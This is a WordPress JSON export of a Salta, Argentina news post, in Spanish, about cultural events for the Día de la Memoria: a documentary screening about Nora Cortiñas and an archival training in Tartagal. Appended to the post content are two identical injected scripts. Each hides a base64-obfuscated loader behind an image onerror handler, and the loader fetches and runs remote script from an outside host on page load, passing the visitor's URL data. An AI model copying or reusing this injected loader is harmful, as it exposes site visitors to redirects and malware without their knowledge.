{"id":4974,"date":"2025-03-25T09:25:07","date_gmt":"2025-03-25T12:25:07","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4974"},"modified":"2025-08-13T23:38:12","modified_gmt":"2025-08-14T02:38:12","slug":"musica-teatro-y-cine-para-conmemorar-la-memoria-la-verdad-y-la-justicia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4974","title":{"rendered":"M\u00fasica, teatro y cine para conmemorar la Memoria, la Verdad y la Justicia"},"content":{"rendered":"\n<p><strong><em>Desde teatro hasta reggae, pasando por rock y cine, la cultura salte\u00f1a se une para conmemorar el D\u00eda de la Memoria con una programaci\u00f3n diversa en diferentes espacios culturales de Salta.<\/em><\/strong><\/p>\n\n\n\n<p>La provincia de Salta se prepar\u00f3&nbsp;para una semana de actividades culturales en conmemoraci\u00f3n del D\u00eda de la Memoria por la Verdad y la Justicia. Con propuestas que incluyen teatro, m\u00fasica, cine y capacitaciones, la memoria colectiva se mantiene viva a trav\u00e9s del arte y la reflexi\u00f3n.<\/p>\n\n\n\n<p>Este&nbsp;martes 25 de marzo a las 20 horas, en el marco del ciclo de \u201cLos Martes\u201d, la Usina Cultural presentar\u00e1 el documental \u00abNorita\u00bb (2024), dirigido por Jayson McNamara y Andrea Tortonese. La pel\u00edcula retrata la vida y lucha de Nora Corti\u00f1as, una de las figuras m\u00e1s emblem\u00e1ticas de los derechos humanos en Argentina, destacando su transformaci\u00f3n desde ama de casa hasta convertirse en un \u00edcono de resistencia tras la desaparici\u00f3n de su hijo Gustavo durante la dictadura.<\/p>\n\n\n\n<p>Finalmente, los d\u00edas 27 y 28 de marzo, en el Centro Cultural de Pueblos Originarios, la Coordinaci\u00f3n General de Bibliotecas y Archivo y la Secretar\u00eda de Cultura y Turismo de la Municipalidad de Tartagal llevar\u00e1n adelante una capacitaci\u00f3n en gesti\u00f3n documental. El equipo del Archivo y Biblioteca Hist\u00f3ricos de la Provincia brindar\u00e1 la formaci\u00f3n el 27 de marzo de 16 a 19 horas y el 28 de marzo de 9 a 15 horas. Para cerrar la jornada del 28, a las 20 horas, se proyectar\u00e1n documentos f\u00edlmicos sobre la historia reciente del Departamento San Mart\u00edn, en las instalaciones del Centro Cultural de Tartagal.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde teatro hasta reggae, pasando por rock y cine, la cultura salte\u00f1a se une para conmemorar el D\u00eda de la Memoria con una programaci\u00f3n diversa en diferentes espacios culturales de Salta. La provincia de Salta se prepar\u00f3&nbsp;para una semana de actividades culturales en conmemoraci\u00f3n del D\u00eda de la Memoria por la Verdad y la Justicia. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4975,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-4974","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4974"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4974"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4974\/revisions"}],"predecessor-version":[{"id":6542,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4974\/revisions\/6542"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4975"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4974"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4974"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4974"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}